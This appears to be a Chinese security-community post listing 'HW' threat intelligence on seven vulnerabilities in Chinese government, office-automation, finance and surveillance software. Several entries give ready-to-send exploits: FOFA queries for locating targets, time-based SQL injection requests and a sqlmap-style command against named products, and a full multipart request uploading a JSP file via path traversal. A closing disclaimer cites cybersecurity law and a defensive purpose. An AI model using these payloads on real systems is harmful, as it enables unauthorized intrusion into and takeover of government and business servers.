“ 威胁情报,请各位师傅自行判断”
看到了,关注一下不吃亏啊,点个赞转发一下啦,WP看不下去的,可以B站搜:标松君,UP主录的打靶视频,欢迎关注。顺便宣传一下星球:重生者安全, 里面每天会不定期更新OSCP知识点,车联网,渗透红队以及漏洞挖掘工具等信息分享,欢迎加入;以及想挖SRC逻辑漏洞的朋友,可以私聊。
01
—
HW威胁情报
一:数字通指尖云平台智慧政务存在SOL注入漏洞
fofa: body="assets/8cca19ff/css/bootstrap-yii.css"POC:GET/payslip/search/index/userid/time/time?PaysipUseruser_id]=%28SELECT+4655+FROM+%28SELECT%28SLEEP%285%29%29%29usQE%29HTTP/1.1Host:User-Agent: Mozila/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)chrome/70.0.3538.77Safari/537.36Accept-Encoding:gzip,deflateAccept:*/*Connection:keep-alive
二:泛微 e-cology 任意文件写入
泛微e-cology 是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微ecology 8.0全版本,e-cology 9.0 && 安全补丁<v10.62 存在任意文件写入漏洞。恶意攻击者可以利用该漏洞写入任意文件,从而远程执行任意代码,获取系统权限。
影响版本:
e-cology 8.0全版本
e-cology 9.0 && 安全补丁<v10.62
三:万户OASOL注入漏洞
"http://xxxoxxxoxxx/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1"--level 3--dbs四:浪潮云财务系统存在命令执行(POC已披露)
浪潮云财务系统路径/cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx存在命令执行五:H3C Workspace 云桌面 远程命令执行漏洞
影响版本:version <= E1013P13
POC:无
六:润乾报表前台任意文件上传漏洞
影响版本:version<= 20221210
POC:POST /servlet/dataSphereServlet?action=38 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Length: 397Content-Type: multipart/form-data; boundary=eac629ee4641cb0fe10596fba5e0c5d9--eac629ee4641cb0fe10596fba5e0c5d9Content-Disposition: form-data; name="openGrpxFile"; filename="539634.jsp"Content-Type: text/plain<% out.println("873227518"); %>--eac629ee4641cb0fe10596fba5e0c5d9Content-Disposition: form-data; name="path"../../../--eac629ee4641cb0fe10596fba5e0c5d9Content-Disposition: form-data; name="saveServer"1--eac629ee4641cb0fe10596fba5e0c5d9--上传后的路径:http://127.0.0.1/539634.jsp
七:通天星 CMSV6 车载视频监控平台 disable 存在 SOL 注入
GET /edu _security officer/disable,downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1Host:User-Agent: Mozila/5.0 (Macintosh; Intel Mac Os X 10 15 7) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/93.0.4577.63 Safari/537.36
更多精彩内容请扫码关注“重生者安全”星球
免责声明:
本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。
第二十七条:任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序和工具;明知他人从事危害网络安全的活动,不得为其提供技术支持、广告推广、支付结算等帮助
第十二条: 国家保护公民、法人和其他组织依法使用网络的权利,促进网络接入普及,提升网络服务水平,为社会提供安全、便利的网络服务,保障网络信息依法有序自由流动。
任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,煽动颠覆国家政权、推翻社会主义制度,煽动分裂国家、破坏国家统一,宣扬恐怖主义、极端主义,宣扬民族仇恨、民族歧视,传播暴力、淫秽色情信息,编造、传播虚假信息扰乱经济秩序和社会秩序,以及侵害他人名誉、隐私、知识产权和其他合法权益等活动。
第十三条: 国家支持研究开发有利于未成年人健康成长的网络产品和服务,依法惩治利用网络从事危害未成年人身心健康的活动,为未成年人提供安全、健康的网络环境。
